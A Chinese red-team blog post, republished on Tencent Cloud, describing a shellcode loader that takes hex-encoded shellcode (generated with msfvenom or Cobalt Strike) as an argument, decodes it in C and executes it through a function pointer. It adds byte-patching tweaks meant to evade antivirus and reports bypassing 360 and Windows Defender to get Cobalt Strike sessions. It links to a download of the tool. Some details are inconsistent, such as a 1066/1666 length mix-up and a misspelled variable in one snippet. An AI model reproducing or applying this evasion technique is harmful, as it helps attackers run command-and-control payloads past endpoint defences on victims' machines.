前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >反转字符串绕杀软

反转字符串绕杀软

作者头像
鸿鹄实验室
发布2021-03-30 17:34:24
6490
发布2021-03-30 17:34:24
举报
文章被收录于专栏:鸿鹄实验室

在github有一个ssi的项目,项目地址如下:https://github.com/DimopoulosElias/SimpleShellcodeInjector/ 他可以实现shellcode的远程加载(十六进制),当然LDrakura也曾经搞过类似的项目(我偷电瓶车养你啊),当时还是一次项目时绕卡巴斯基的时候他丢我的。本文将简单介绍该项目的原理,并给出其他实现方法。

shellcode处理

首先需要处理shellcode,这里推荐使用kali直接处理,推荐下面的两种方法。

代码语言:javascript
复制
cat 1.txt | grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

或者

代码语言:javascript
复制
msfvenom -p windows/exec CMD=calc.exe -f raw | xxd -ps

cs的shellcode推荐第二种,如果是第一种,需要做一些调整操作,像下面这样:

加载原理

加载器通过参数的方式传递hex的shellcode到加载器内,然后使用一些操作还原shellcode,这里有一些需要注意的点,比如数组的长度为1066,那么他就是由shellcode[0]=f到shellcode[1665]=7构成后面加上一个终止符,此时strlen(shellcode)=1666,sizeof(shellcode)=1667,所以在计算长度时便需要这样 x=(sizeof(shellcode) - 1) . or x= strlen(shellcode),因为每两个字节为一组,所以我们在分配内存时,需要进行除二操作,比如bytes = (sizeof(shellcode) - 1)/2 或者 bytes = strlen(shellcode)/2。

接下来便是还原shellcode的操作了

代码语言:javascript
复制
for(unsigned int i = 0; i< iterations-1; i++) {
        sscanf(shellcode+2*i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }

或者使用下面这样的方法:

代码语言:javascript
复制
void AsciiToHex(char * pAscii, unsigned char * pHex, int nLen) 
{   if (nLen % 2)         
    return;     
  int nHexLen = nLen / 2;     
  for (int i = 0; i < nHexLen; i++)     
  {         
    unsigned char Nibble[2];         
    Nibble[0] = *pAscii++;         
    Nibble[1] = *pAscii++;         
    for (int j = 0; j < 2; j++)         
    {             
      if (Nibble[j] <= 'F' && Nibble[j] >= 'A')                 
        Nibble[j] = Nibble[j] - 'A' + 10;             
      else if (Nibble[j] <= 'f' && Nibble[j] >= 'a')                 
        Nibble[j] = Nibble[j] - 'a' + 10;             
      else if (Nibble[j] >= '0' && Nibble[j] <= '9')                 
        Nibble[j] = Nibble[j] - '0';             
      else                 
        return;        
    }   // for (int j = ...)         
    pHex[i] = Nibble[0] << 4;   // Set the high nibble         
    pHex[i] |= Nibble[1];   //Set the low nibble     
  }   // for (int i = ...) 
}

然后剩下的便是分配内存、装入shellcode,作者使用的是

代码语言:javascript
复制
(*(void (*)()) exec)();

来进行最后的加载。

测试

明白原理之后,重新编译(原文件md5可能已被标记),使用360全家桶进行扫描:

联网情况下是没有任何问题的,然后上线我们的cs试试:

可直接上线,注:x64的shellcode上线有问题,程序会崩溃。

修改

更改shellcode前几个字节,然后加载到内存更改回来,然后解密hex加载,并更改shellcode加载方式。

更改加载的方法之前也是发过的。

反转方式如下:

代码语言:javascript
复制
char first[] = "\xfc";
memcpy(shellcode,fisrt,1);

加载方式如下:

代码语言:javascript
复制
typedef void (*some_func)();
   some_func func = (some_func)exec;
   func();

ps:只是更改了一个写法。

测试弹出计算器:

windows defender上线测试:

总结:

cs生成的shellcode过长,可想直接写入程序,程序下载地址:

https://github.com/lengjibo/RedTeamTools/tree/master/windows/SSI

欢迎star

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-09-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档